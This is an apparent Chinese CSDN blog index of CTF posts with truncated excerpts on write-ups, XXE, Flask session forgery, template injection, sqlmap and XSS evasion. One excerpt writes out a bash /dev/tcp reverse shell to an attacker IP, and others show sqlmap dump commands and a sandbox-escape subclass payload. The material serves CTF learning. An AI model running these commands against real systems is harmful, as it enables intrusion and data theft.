CTF
文章平均质量分 97
记录CTF中遇到的一些知识点
夏日 の blog
私信前请先点个关注,只回粉丝私信。
展开
-
CTF杂项总结
目录一、流量分析篇二、文件头篇三、压缩包篇四、图片隐写篇五、音频隐写篇六、视频隐写七、取证八、Other参考文章:一、流量分析篇通常比赛中会提供一个包含流量数据的 PCAP 文件,有时候也会需要选手们先进行修复或重构传输文件后,再进行分析。PCAP 这一块作为重点考察方向,复杂的地方在于数据包里充满着大量无关的流量信息,因此如何分类和过滤数据是参赛者...转载 2020-02-01 14:26:27 · 21997 阅读 · 7 评论 -
BJDCTF-writeup
本篇文章为个人做题时的部分wp,如有错误,请联系我更正。目录杂项最简单的misc-y1ngA_Beautiful_Picture小姐姐-y1ngEasyBaBa圣火昭昭-y1ngTARGZ-y1ng总结杂项最简单的misc-y1ng题目是一个zip包,尝试解压出错,用AZR压缩包修复工具修复后,解压得到一个secret文件,由于没有后缀名,放入010editor查看,发现含有IHDR...原创 2020-03-23 20:18:43 · 1897 阅读 · 5 评论 -
CRC爆破宽高
目录前言解析IHDR例题脚本前言有时CTF杂项给一张png图片,linux下打不开(白屏),Windows下可查看图片,就可能是宽高被修改解析IHDR例题选自2020安恒月赛下载压缩包解压出一张PNG图片,linux下打不开,如图所示猜测是对其高或宽进行了更改,需要进行CRC爆破以获得原来的宽和高,修改回去就行了。脚本import zlibimport structcrc...原创 2020-02-27 21:08:37 · 4421 阅读 · 6 评论 -
CTF密码大全
通信领域的编码1.摩斯编码特征特点:用点(.)和划(-)来编码范围0-9、A-Z的字符,字母不区分大小写,两个字母之间的空格用斜杠(/)或者三个点(.)或者一个划(-)表示,两个单词之间的间隔是七个点(.)。 根据摩斯编码的原理,CTF中也有出现过变种的摩斯编码,比如点(.)和划(-)用数字0和1来表示等...转载 2020-02-10 18:30:47 · 6030 阅读 · 0 评论 -
ISCC 2021 WP
MISC李华的红包打开发现是一个图片,binwalk分离下文件后得到一个txt文件,内容如下24,43,13,13,12,21,43很明显是敲击码(如果改下图片大小为521*521会看到下面有个鼓也会提示这是敲击码)分别对应着ISCCBFSISCC{ISCCBFS}Retrieve the passcode解压后得到一个压缩包和一个名为scatter的txt文档打开txt文档发现1:3:1;1.25:3:1;1.5:3:1;1.75:3:1;2:3:1;2:2.75:1;2:2.5原创 2021-05-25 13:02:34 · 7415 阅读 · 26 评论 -
CTF XXE漏洞攻击
文章目录Fake XML CookbookTrue XML CookbookISCC 未知的风险-1参考Fake XML CookbookF12 查看源码:function doLogin(){ var username = $("#username").val(); var password = $("#password").val(); if(username == "" || ...原创 2020-05-07 16:01:50 · 3803 阅读 · 0 评论 -
[HCTF 2018]admin wp
文章目录题目说明玄学 非预期解flask session伪造(也是非预期解)找秘钥伪造sessionunicode欺骗(预期解法)写在最后题目说明题目来源于BUUCTF,链接:点我查看玄学 非预期解题目名称为admin,应该是让用admin登录源码中也印证了这一点登录页面乱输密码试了下,输入123时然后它就登进去了!!!这样的话暴力破解也能得到flag,但是以buuctf的web题...原创 2020-05-03 18:37:26 · 865 阅读 · 1 评论 -
WUST-CTF2020-WP
目录WEBcheckinadminCV Makereasywebtrain yourself to be godlyMISCSpace ClubWelcomeAlison likes jojoShopgirlfriend小结WEBcheckin打开页面显示Who’s the author?,回到题目发现作者是52HeRtz,输入52HeRtz发现有截断,f12选中输入框把maxlength改...原创 2020-03-29 21:02:14 · 5355 阅读 · 10 评论 -
反弹Shell
说明:端口可任意,但要保持一致而且不能被占用,以下均为攻击机登录被攻击机bash连接攻击机器输入 nc -lvp 7777被攻击机器输入bash -i >& /dev/tcp/攻击机ip/7777 0>&1 然后攻击机器就相当于登陆了了被攻击机器curl连接在攻击机根目录下创建shell.txt,内容为bash -i >& /dev/tc...原创 2020-03-26 14:01:12 · 985 阅读 · 0 评论 -
百度杯CTF比赛 九月场——123
目录题目描述writeup小结题目描述writeup打开页面是一个登录页面,查看源码发现提示语句访问user.php发现界面为空,此时尝试打开备份文件,发现user.php.bak,下载后发现用户名,根据上述源码提示采用burpsuite爆破,配置如下,注意选取Clusterbomb模式(因为要尝试多个payload,详细见:Burp Suite Intruder4种攻击类型)三个...原创 2020-03-20 14:26:03 · 1254 阅读 · 0 评论 -
Burp Suite Intruder4种攻击类型
目录Sniper(狙击手模式)Battering ram(攻城锤模式)Pitchfork(草叉模式)Cluster bomb(集束炸弹模式)Sniper(狙击手模式)狙击手模式只能使用一组payload,它一次只使用一个payload位置。假设你标记了A位置和B位置,payload为m,n。那么会形成下列4种组合。第几次攻击A位置数值B位置数值1m原来的数值2...原创 2020-03-20 13:34:04 · 1405 阅读 · 0 评论 -
php伪随机数
目录函数介绍代码测试考点1.根据种子预测随机数2.根据随机数预测种子函数介绍mt_scrand() //播种 Mersenne Twister 随机数生成器。mt_rand() //生成随机数简单来说mt_scrand()通过分发seed种子,然后种子有了后,靠mt_rand()生成随机数代码测试<?php mt_srand(12345); echo mt_ra...原创 2020-02-15 14:45:45 · 3368 阅读 · 2 评论 -
Pkav HTTP Fuzzer教程
以Hacking Lab的验证码题为例题目对Pkav HTTP Fuzzer配置1.标记爆破的位置,图形验证码,选择字典2.设置验证码范围3.添加验证码地址,进行相关设置tips:下方可进行识别测试4.本题需要设置验证码识别模式为单线程点击下方重放选项选择单线程4.发包器页面启动爆破根据长度判断是否成功(点击长度即可自动排序)...原创 2020-02-11 19:54:03 · 10146 阅读 · 15 评论 -
CTF条件竞争
简介条件竞争是指一个系统的运行结果依赖于不受控制的事件的先后顺序。当这些不受控制的事件并没有按照开发者想要的方式运行时,就可能会出现 bug。尤其在当前我们的系统中大量对资源进行共享,如果处理不当的话,就会产生条件竞争漏洞。个人理解通俗的来讲就是假设程序同时处理存钱和取钱,当取钱"速度"大于存钱时,可能就会出现取钱后程序还未来得及将金额减少,程序又立马处理存钱,由此产生非预期的结果。竞争...原创 2020-02-10 14:15:08 · 2661 阅读 · 1 评论 -
XSS Filter Evasion Cheat Sheet 中文版
前言译者注: 翻译本文的最初原因是当我自己看到这篇文章后,觉得它是非常有价值。但是这么著名的一个备忘录却一直没有人把它翻译成中文版。很多人仅仅是简单的把文中的各种代码复制下来,然后看起来很刁的发在各种论坛上,不过你要真去认真研读这些代码,就会完全不知所云了。原因是这篇文章最精华的部分是代码的解释而非代码本身。一方面为了自己学习,一方面也想让更多国内的xss爱好者去更方便的阅读本文。所以虽然我...转载 2020-02-07 17:15:49 · 1165 阅读 · 0 评论 -
CTF WEB总结
1.http协议报头使用referer字段来伪造来源问:某些页面要求你必须要通过http://www.xxxx.com进行访问?答:增加一个referer字段Referrer:http://www.xxxx.com (题目要求的url)使用X-Forwarded-For来伪造ip问:题目要求必须是某个ip地址如1.1.1.1,才允许访问。答:增加一个X-Forwarded-For字...转载 2020-02-06 19:54:35 · 116800 阅读 · 1 评论 -
python沙箱逃逸
说明:本篇文章适合这方面的小白的入门,结合我的另一篇文章https://blog.csdn.net/zss192/article/details/104199520更容易理解一些常见的寻找特殊模块的方式__class__:获得当前对象的类__bases__:列出其基类__mro__ :列出解析方法的调用顺序,类似于bases__subclasses__():返回子类列表__dict...原创 2020-02-06 19:24:55 · 1555 阅读 · 0 评论 -
[wp] Web_python_template_injection 攻防世界
打开题目我们看到提示python模板注入,尝试{{1+1}}看看{{}}是否被执行由上图可知代码被执行确实存在模板注入1.查看所有子类{{[].__class__.__base__.__subclasses__()}}...原创 2020-02-06 18:37:31 · 1361 阅读 · 1 评论 -
sqlmap使用一般流程
一般流程1.检查注入点:sqlmap -u “http://192.168.0.182/” --data “word=1&number=5” --batch2.爆所有数据库信息:sqlmap -u “http://192.168.0.182/” --data “word=1&number=5” --dbs --batch3.爆当前数据库信息:sqlmap -u “htt...原创 2020-02-02 14:55:40 · 1192 阅读 · 0 评论 -
http header题总结
1.必须从本机登陆 X-Forwarded-For:127.0.0.12.用域名登陆 将host:字段的ip地址改成网页上给出的域名3.从百度跳转登陆 Referer: https://www.google.com4.必须通过ie4.0登陆 修改User-agent5.电脑上必须安装了.net8 user-aget中加入.net clr 8.06.必须是德国用户 Accept-Lan...原创 2020-02-02 13:40:37 · 1157 阅读 · 0 评论